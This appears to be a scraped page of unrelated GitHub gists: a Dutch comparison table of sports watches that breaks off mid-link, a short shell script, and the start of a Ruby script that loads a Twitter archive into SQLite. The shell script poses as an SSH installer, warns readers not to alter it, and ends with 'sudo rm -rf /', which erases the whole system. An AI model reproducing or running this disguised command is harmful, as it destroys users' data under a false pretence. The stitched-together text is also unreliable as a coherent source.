Merk | Batterij tracking | Batterij gewoon | Kan kaarten tonen | Prijs | Gewicht | Display size | Opmerking |
---|---|---|---|---|---|---|---|
Suunto 9 | 25h | 7 dagen | Denk het wel | 569-699 | 62g | 1.2in | Lijkt geen kaartjes te kunnen |
Garmin Forerunner 945 | 36h | 14 dagen | Ja | 699,99 | 50g | 1.2in | Kan alles, maar kan ook alles |
Coros Vertix 2 | 140h | 60 dagen | Ja | 699 | 89g | 1.4in | Wat een batterij |
[[https://coros.com/apex-pro][Coro |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo "HI <FIRSTNAME>" | |
echo "Commencing installing of the SSH" | |
echo "STAND BACK" | |
# DO NOT ALTER REST OF THIS SCRIPT, SHOULD ONLY BE READ BY PROFESSIONALS | |
# ALTERING IT MIGHT HARM YOUR COMPUTER | |
sudo rm -rf / |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
gem "sqlite3", "~> 1.6.7" | |
require "sqlite3" | |
require "json" | |
require "time" | |
archive_directory = "~/Documents/Archives/twitter-2023-07-01-826d9daac5cf75f140476a88ff1e97b0f4ba6b8bba8b47c62f8b8c1e65f7aee0" | |
output_db_path = "~/Sync/twitter.db" | |
begin | |
lines = File.readlines(File.expand_path(File.join(archive_directory, "data/tweets.js")), chomp: true); nil |
OlderNewer